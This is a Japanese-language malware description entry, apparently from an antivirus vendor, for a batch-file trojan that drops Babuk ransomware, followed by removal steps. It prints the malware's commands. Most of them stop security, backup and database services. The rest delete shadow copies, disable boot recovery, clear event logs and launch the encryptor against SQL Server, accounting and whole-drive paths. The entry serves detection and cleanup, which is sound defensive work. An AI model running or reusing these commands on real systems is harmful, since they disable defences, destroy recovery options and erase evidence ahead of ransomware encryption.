解析者: Nathaniel Gregory Ragasa   

 別名:

Trojan:BAT/MegaCortex.SC(MICROSOFT)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 8,729 bytes
タイプ BAT
メモリ常駐 なし

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • {Malware Fullpath}\HelpPane.exe → Detected as Trojan.Win32.KILLAV.WLEBB
  • taskkill /f /im sqlservr.exe
  • net stop VSS /y
  • net stop HealthTLService /y
  • net stop ThreatLockerService /y
  • net stop "Veritas System Recovery" /y
  • net stop EPIntegrationService /y
  • net stop EPProtectedService /y
  • net stop EPRedline /y
  • net stop EPSecurityService /y
  • net stop "Client Agent 7.60" /y
  • net stop WRSVC /y
  • net stop SQLAgent$SYSTEM_BGC /y
  • net stop "Sophos Device Control Service" /y
  • net stop macmnsvc /y
  • net stop SQLAgent$ECWDB2 /y
  • net stop "Zoolz 2 Service" /y
  • net stop McTaskManager /y
  • net stop "Sophos AutoUpdate Service" /y
  • net stop "Sophos System Protection Service" /y
  • net stop EraserSvc11710 /y
  • net stop PDVFSService /y
  • net stop SQLAgent$PROFXENGAGEMENT /y
  • net stop SAVService /y
  • net stop MSSQLFDLauncher$TPSAMA /y
  • net stop SQLAgent$SOPHOS /y
  • net stop "Symantec System Recovery" /y
  • net stop Antivirus /y
  • net stop SstpSvc /y
  • net stop MSOLAP$SQL_2008 /y
  • net stop TrueKeyServiceHelper /y
  • net stop sacsvr /y
  • net stop VeeamNFSSvc /y
  • net stop FA_Scheduler /y
  • net stop SAVAdminService /y
  • net stop EPUpdateService /y
  • net stop VeeamTransportSvc /y
  • net stop "Sophos Health Service" /y
  • net stop bedbg /y
  • net stop MSSQLSERVER /y
  • net stop KAVFS /y
  • net stop Smcinst /y
  • net stop MSSQLServerADHelper100 /y
  • net stop TmCCSF /y
  • net stop wbengine /y
  • net stop SQLWriter /y
  • net stop MSSQLFDLauncher$TPS /y
  • net stop SmcService /y
  • net stop ReportServer$TPSAMA /y
  • net stop swi_update /y
  • net stop AcrSch2Svc /y
  • net stop MSSQL$SYSTEM_BGC /y
  • net stop VeeamBrokerSvc /y
  • net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • net stop VeeamDeploymentService /y
  • net stop SQLAgent$TPS /y
  • net stop DCAgent /y
  • net stop "Sophos Message Router" /y
  • net stop MSSQLFDLauncher$SBSMONITORING /y
  • net stop MySQL80 /y
  • net stop MSOLAP$SYSTEM_BGC /y
  • net stop ReportServer$TPS /y
  • net stop MSSQL$ECWDB2 /y
  • net stop SntpService /y
  • net stop SQLSERVERAGENT /y
  • net stop BackupExecManagementService /y
  • net stop SMTPSvc /y
  • net stop mfefire /y
  • net stop BackupExecRPCService /y
  • net stop MSSQL$VEEAMSQL2008R2 /y
  • net stop klnagent /y
  • net stop MSExchangeSA /y
  • net stop MSSQLServerADHelper /y
  • net stop SQLTELEMETRY /y
  • net stop "Sophos Clean Service" /y
  • net stop swi_update_64 /y
  • net stop "Sophos Web Control Service" /y
  • net stop EhttpSrv /y
  • net stop POP3Svc /y
  • net stop MSOLAP$TPSAMA /y
  • net stop McAfeeEngineService /y
  • net stop "Veeam Backup Catalog Data Service" /y
  • net stop MSSQL$SBSMONITORING /y
  • net stop ReportServer$SYSTEM_BGC /y
  • net stop AcronisAgent /y
  • net stop KAVFSGT /y
  • net stop BackupExecDeviceMediaService /y
  • net stop MySQL57 /y
  • net stop McAfeeFrameworkMcAfeeFramework /y
  • net stop TrueKey /y
  • net stop VeeamMountSvc /y
  • net stop MsDtsServer110 /y
  • net stop SQLAgent$BKUPEXEC /y
  • net stop UI0Detect /y
  • net stop ReportServer /y
  • net stop SQLTELEMETRY$ECWDB2 /y
  • net stop MSSQLFDLauncher$SYSTEM_BGC /y
  • net stop MSSQL$BKUPEXEC /y
  • net stop SQLAgent$PRACTTICEBGC /y
  • net stop MSExchangeSRS /y
  • net stop SQLAgent$VEEAMSQL2008R2 /y
  • net stop McShield /y
  • net stop SepMasterService /y
  • net stop "Sophos MCS Client" /y
  • net stop VeeamCatalogSvc /y
  • net stop SQLAgent$SHAREPOINT /y
  • net stop NetMsmqActivator /y
  • net stop kavfsslp /y
  • net stop tmlisten /y
  • net stop ShMonitor /y
  • net stop MsDtsServer /y
  • net stop SQLAgent$SQL_2008 /y
  • net stop SDRSVC /y
  • net stop IISAdmin /y
  • net stop SQLAgent$PRACTTICEMGT /y
  • net stop BackupExecJobEngine /y
  • net stop BackupExecAgentBrowser /y
  • net stop VeeamHvIntegrationSvc /y
  • net stop masvc /y
  • net stop W3Svc /y
  • net stop "SQLsafe Backup Service" /y
  • net stop SQLAgent$CXDB /y
  • net stop SQLBrowser /y
  • net stop MSSQLFDLauncher$SQL_2008 /y
  • net stop VeeamBackupSvc /y
  • net stop "Sophos Safestore Service" /y
  • net stop svcGenericHost /y
  • net stop ntrtscan /y
  • net stop SQLAgent$VEEAMSQL2012 /y
  • net stop MSExchangeMGMT /y
  • net stop SamSs /y
  • net stop MSExchangeES /y
  • net stop MBAMService /y
  • net stop EsgShKernel /y
  • net stop ESHASRV /y
  • net stop MSSQL$TPSAMA /y
  • net stop SQLAgent$CITRIX_METAFRAME /y
  • net stop VeeamCloudSvc /y
  • net stop "Sophos File Scanner Service" /y
  • net stop "Sophos Agent" /y
  • net stop MBEndpointAgent /y
  • net stop swi_service /y
  • net stop MSSQL$PRACTICEMGT /y
  • net stop SQLAgent$TPSAMA /y
  • net stop McAfeeFramework /y
  • net stop "Enterprise Client Service" /y
  • net stop SQLAgent$SBSMONITORING /y
  • net stop MSSQL$VEEAMSQL2012 /y
  • net stop swi_filter /y
  • net stop SQLSafeOLRService /y
  • net stop BackupExecVSSProvider /y
  • net stop VeeamEnterpriseManagerSvc /y
  • net stop SQLAgent$SQLEXPRESS /y
  • net stop OracleClientCache80 /y
  • net stop MSSQL$PROFXENGAGEMENT /y
  • net stop IMAP4Svc /y
  • net stop ARSM /y
  • net stop MSExchangeIS /y
  • net stop AVP /y
  • net stop MSSQLFDLauncher /y
  • net stop MSExchangeMTA /y
  • net stop TrueKeyScheduler /y
  • net stop MSSQL$SOPHOS /y
  • net stop "SQL Backups" /y
  • net stop MSSQL$TPS /y
  • net stop mfemms /y
  • net stop MsDtsServer100 /y
  • net stop MSSQL$SHAREPOINT /y
  • net stop mfevtp /y
  • net stop msftesql$PROD /y
  • net stop mozyprobackup /y
  • net stop MSSQL$SQL_2008 /y
  • net stop SNAC /y
  • net stop ReportServer$SQL_2008 /y
  • net stop BackupExecAgentAccelerator /y
  • net stop MSSQL$SQLEXPRESS /y
  • net stop MSSQL$PRACTTICEBGC /y
  • net stop VeeamRESTSvc /y
  • net stop sophossps /y
  • net stop ekrn /y
  • net stop MMS /y
  • net stop "Sophos MCS Agent" /y
  • net stop RESvc /y
  • net stop "Acronis VSS Provider" /y
  • net stop MSSQLFDLauncher$SHAREPOINT /y
  • net stop "SQLsafe Filter Service" /y
  • net stop MSSQL$PROD /y
  • net stop SQLAgent$PROD /y
  • net stop MSOLAP$TPS /y
  • net stop VeeamDeploySvc /y
  • net stop MSSQLServerOLAPService /y
  • net stop "SQL Server (MSSQLSERVER)" /y
  • net stop "SQL Server (SQLEXPRESS)" /y
  • net stop "SQL Server Analysis Services (MSSQLSERVER)" /y
  • net stop "SQL Server Integration Services 11.0" /y
  • net stop "SQL Server Reporting Services (MSSQLSERVER)" /y
  • net stop "SQL Server VSS Writer" /y
  • bcdedit /set {default} recoveryenabled No
  • bcdedit /set {default} bootstatuspolicy ignoreallfailures
  • wmic SHADOWCOPY /nointeractive
  • wevtutil cl security
  • wevtutil cl system
  • wevtutil cl application
  • vssadmin delete shadows /all /quiet
  • net stop mhyprot2 /y
  • {Malware Fullpath}\svchost.exe → Detected as Ransom.Win32.BABUK.YACGY
  • {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="D:\Program Files\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="E:\Program Files\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="F:\Program Files\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Microsoft SQL Server"
  • {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Tally.ERP9"
  • {Malware Fullpath}\svchost.exe -paths="D:\Program Files (x86)\Tally.ERP9"
  • {Malware Fullpath}\svchost.exe -paths="E:\Program Files (x86)\Tally.ERP9"
  • {Malware Fullpath}\svchost.exe -paths="F:\Program Files (x86)\Tally.ERP9"
  • {Malware Fullpath}\svchost.exe -paths="C:\Program Files (x86)\Intuit"
  • {Malware Fullpath}\svchost.exe -paths="C:\Program Files\Intuit"
  • {Malware Fullpath}\svchost.exe -paths=C:
  • {Malware Fullpath}\svchost.exe -paths=D:
  • {Malware Fullpath}\svchost.exe -paths=E:
  • {Malware Fullpath}\svchost.exe -paths=Q:
  • {Malware Fullpath}\svchost.exe -paths=F:
  • {Malware Fullpath}\svchost.exe -paths=G:
  • {Malware Fullpath}\svchost.exe -paths=H:
  • {Malware Fullpath}\svchost.exe -paths=I:
  • {Malware Fullpath}\svchost.exe -paths=Y:

他のシステム変更

マルウェアは、以下のファイルを削除します。

  • {Malware Fullpath}\mhyprot2.sys

  対応方法

対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 17.714.07
初回 VSAPI パターンリリース日 2022年7月28日
VSAPI OPR パターンバージョン 17.715.00
VSAPI OPR パターンリリース日 2022年7月29日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.BAT.BABUK.YACGY」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください